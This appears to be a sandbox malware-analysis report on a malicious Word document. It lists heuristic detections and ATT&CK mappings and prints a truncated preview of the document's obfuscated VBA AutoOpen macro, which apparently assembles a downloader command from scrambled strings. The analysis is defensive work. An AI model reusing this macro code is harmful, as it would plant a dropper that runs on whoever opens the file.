MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The VBA macro code is heavily obfuscated and truncated, making it difficult to determine its exact functionality. However, the presence of AutoOpen and the obfuscation suggest it's designed to download and execute a secondary payload. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malware.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 123,904 bytes but its declared streams total only 32,709 bytes — 91,195 bytes (74%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16184 bytes |
SHA-256: 15962c186256d5b3d834eaeaf05ae61b0f0379e5698080c84d439eedd554ce97 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rdAMzIN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If Plfiw <= wdvCo Then
Dim GiMTs()
MzuYB = WubjbY + NATMU
srLPzr = WMhfrX + ACpGq + jHEzRC + CaVnW
End If
If AIBiwj Xor dKMwp Then
Dim LALKM()
jGknO = vTvvqu + zqMsB
End If
If hCwrB >= 12 Then
Dim zMCPLb()
IaPUm = BMHiTS + qNzHKD + LBDnw + VzHtj
TIqPwX = WIzaU + ZOljMu + HYpGX + YZPDFN
End If
vzjUjjQMk (jdCTbnii + YkliiRj + cOLiRU + tpiJM + DENjuDmDDOz + BrLNkE + PbsCK + TUbXOc + AhsUGCbYluO + htszuQ + izzCjvhu + iKWwjOu)
If XuSjsU Or 19 Then
Dim pHEsNT()
akllKK = adbfp + BafpK + aQELP + hkGZq
End If
If OVwOz Or 14 Then
Dim kpSwRr()
DDzOc = hztYV + WjcZC + mFRav + LhNZY
TmULC = nrzcoP + zaqbw + PPwfl + cIsCuA
End If
End Sub
Attribute VB_Name = "lEjDKdzmKCK"
Function jdCTbnii()
If mVvEu Or PcqSWz Then
Dim MSKCG()
fMQnX = WKVWW + slwlcD
End If
If sHYjH >= NNaCq Then
Dim aaipW()
YzYbuG = oiOSb + GDuRYo
jQrJkS = SDSCHO + iAnRMR
End If
If OdBpCc > rWlLN Then
Dim aRQZiw()
tjGAT = zzOjQJ + MpCOn + ATzzq + cKdzw
zzDFi = BWadN + mVBGjk
End If
mPszlFZ = "`ja ,S[7[L,@ [p[" + "b[q [i[t[a:[X0[J[ [Q" + "[{K[ [F[4[H[" + " " + """" + "[g[>[ [B[T" + "&[ [n[N@[ [v" + """" + "[5[ ][x"
If QXiLv > UDKZO Then
Dim JLsCi()
zEciFa = BmVSQ + LbAlC
End If
If wuzNkA = IKAmBI Then
Dim PrcbA()
MMLMtb = HzLWX + osOkE + SYJsGc + WsXajq
iQmin = IwXIw + OoUOAG
End If
If bOdNNX >= 1 Then
Dim UQtGBw()
IfLzqF = Nbfww + hinLLR + cWJdR + qUIjor
aDbOXn = aNnwQP + tqdhvj + DmVhhq + pErqE
End If
If tSDfNW = nEapZD Then
Dim lNioPC()
knrfX = pZcvs + GMGaWd
End If
If zwMHu > IQwzuw Then
Dim qjjjm()
DruSw = uEDqJZ + FZdBrU + OSDCnb + FibvQ
End If
If iMCTEj Eqv 16 Then
Dim FKjZcj()
iXFjz = mWAAuc + GCdXU + JdVNS + EUDloj
zCKwI = JmuLM + ZbVtD + LFQXiI + nBtRj
End If
WRWkiF = "[F[ [b[Q[j[" + " [7i[*[ [#[T[L [" + "b[N[2[ [-[W[*[ [w[i[" + "j [_[t[J [9[fS" + "[ [r[;[G[ {[x[<[" + "z[3[$[;[z[p[2[{xM[a"
rWWjiZI = "[\[e[8[R[9`[l[#[Qq[c" + "B[z[^[y[{[U`K[y" + "[?[z[^w[#[" + "8&[ [B[h[X[j[x[^["
jdCTbnii = mPszlFZ + WRWkiF + rWWjiZI
If DYoXZr Or iKNCZ Then
Dim ifCtIw()
RFjpw = kJvIMu + PmEsX + opDLU + RRLZpz
WzMwsz = vGFnCA + UhraJ
End If
If czzlrn >= bEkakQ Then
Dim mEkfE()
izNjR = mjFRkP + QjUBT + BMHclG + VZdaR
LYEckO = JBCWn + LiAbSC
End If
If KhNtLK = LYjGLP Then
Dim EDoMt()
OhjQIT = wkUzf + zMSzEj + vjhWhr + kPiCOQ
End If
End Function
Function YkliiRj()
OwnwS = "Xd[Rb[)[U[6oD" + "[\[E[_8[<[3[" + "8[P[X/[QT[f" + "[y[p[9[P[D@[Y[>[![!" + "['[][G[ U[I@[" + "j[E[>s[b[E[X[j[q["
If oWXbc Or NMDfz Then
Dim DcLHk()
zfzKlp = uYUzKX + sIkhF + lIwow + nzIFoU
End If
If lhdIzV Xor 11 Then
Dim kGLNBZ()
VLWvI = KoGsT + Cropj + MVcdo + PEwILi
End If
If RKEil <> phmsPs Then
Dim zJvsi()
bBrjK = uCpmS + ddIihE
wYTDW = ZFjon + NKSGN + btSqfz + TMlPzQ
End If
zrJZHMKfw = "+[j[V[F[H[N[![*p[" + "$S[bS[e7[h[![B[t" + "[l[m[?,sKu[2k[#[/[V" + "F[W[:_[8&)[w&[m[B["
ZdlAHW = "X[Q[6[8[+[p[X[:[V@[v" + "[V[B! [l[?[" + " [XR[I[)[A@[t[R[" + "T[Q[{o[T" + """" + "[7[m[]" + """" + "["
nHjVW = "-[![j[Z[+%[?3[R[b[" + "m[J[f[i[I[{[;[f[e[" + "0[pC" + """" + "[X[8[" + "a[A[2O[^[g@[r[l" + "[bS[A[i[e["
If OrZtE <> Vjzbl Then
Dim pSnwRb()
pEcsXY = DKBcbb + noAOw + OqoiBD + amIMu
aIQlw = UYELi + zJSBi
End If
If UvbwPw <= UOFRBp Then
Dim YAMXCB()
cHKfK = BtrYH + iZHzK
nIhFT = JombIG + clUsoR + FooaX + JjLIRB
End If
aDKWp = "N[Gk" + """" + "+[f[t[L[f?[" + "l[M&[X[A[_[8%[+[5" + "[n[H[n[;[x[P[c[" + "\[7[m[g[D[_[" + "W[![f[v[y[x,s[*"
YkliiRj = OwnwS + zrJZHMKfw + ZdlAHW + nHjVW + aDKWp
If tfWoW < VXakk Then
Dim fjJhSh()
wzTGhm = cddKGE + NspVA
End If
If kQOqml And zBbwUK Then
Dim PZYpB()
srtPdj = SqULSm + LiEQuA
fbCMmt = zSQjwB + sWzMG + MGhPfh + NjUIu
End
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.